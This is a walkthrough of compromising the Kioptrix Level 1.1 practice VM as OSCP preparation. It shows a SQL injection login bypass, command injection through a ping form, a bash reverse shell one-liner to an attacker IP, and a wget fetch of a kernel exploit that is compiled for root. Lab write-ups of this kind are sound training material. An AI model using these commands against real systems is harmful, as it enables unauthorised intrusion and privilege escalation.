Kioptrix - Level 1.1

Kioptrix Level 1.1 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.

First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.

Kioptrix Level 1.1 netdiscover

Next, I ran threader3000 and let it run it’s suggested nmap scan to enumerate the open ports.

Kioptrix Level 1.1 threader3000

Kioptrix Level 1.1 nmap

Let’s take a look at the websites on ports 80 and 443 to start. The same site comes up asking you to login both over http and https.

Kioptrix Level 1.1 website

We know mysql is running on port 3306 based on nmap, so let’s try to use basic SQL injection to see if we can bypass authentication. For the username I entered admin and for the password I entered ’ or 1=1 – -

This allowed me to bypass authentication and leads me to a screen that allows me to ping a machine on the network.

Kioptrix Level 1.1 Basic Admin Console

Let’s enter the following and see what happens:;whoami. This causes another tab to open up, where it shows the results of pinging localhost along with the user on the last line (apache). This confirms that this is open to command injection!

Kioptrix Level 1.1 command injection

Open up a new terminal window from your attacker pc and run nc -nvlp 4444 to start a listener on port 4444.

Kioptrix Level 1.1 nc listener

Go back to your web browser, close the newly opened tab with the ping/whoami output, and go back to the admin web console. Enter;bash -i >& /dev/tcp/[attacker ip]/4444 0>&1 and click on submit.

Kioptrix Level 1.1 command injection reverse shell

Once submitted, look at your terminal with the netcat listener, you should have a reverse bash shell.

Kioptrix Level 1.1 reverse shell

Running whoami shows that you are the apache user. Running uname -a shows that this is using Linux Kernel 2.6.9-55.EL on an i386 platform.

Kioptrix Level 1.1 whoami uname -a

On another terminal window on your attacker pc, run searchsploit 2.6.x, and you will find a Local Privilege Escalation exploit as shown below:

Kioptrix searchsploit Linux Kernel

Let’s run searchsploit -m 9545 to make a copy of this script in our current directory and run python3 -m http.server to serve up a python HTTP server.

Kioptrix Level 1.1 searchsploit copy python http server

From your apache shell on the victim computer, run cd /tmp followed by wget http://[attacker ip]:8000/9545.c

Kioptrix Level 1.1 wget copy exploit

Next, run cat 9545.c and look at the comments, you will see a section on how to compile this exploit.

Kioptrix Level 1.1 cat exploit

To compile this exploit, run gcc -Wall -o 9545 9545.c, as the filename we’re using is 9545.c instead of linux-sendpage.c. This will create an executable called 9545 in the /tmp folder.

Kioptrix Level 1.1 compile exploit

As you can see, this compiled as 9545 and is executable. run ./9545 and you should end up with a root shell!

Kioptrix Level 1.1 root shell

That’s it! There wasn’t any flags I could find like in Level 1, so I don’t believe there is one present on this box.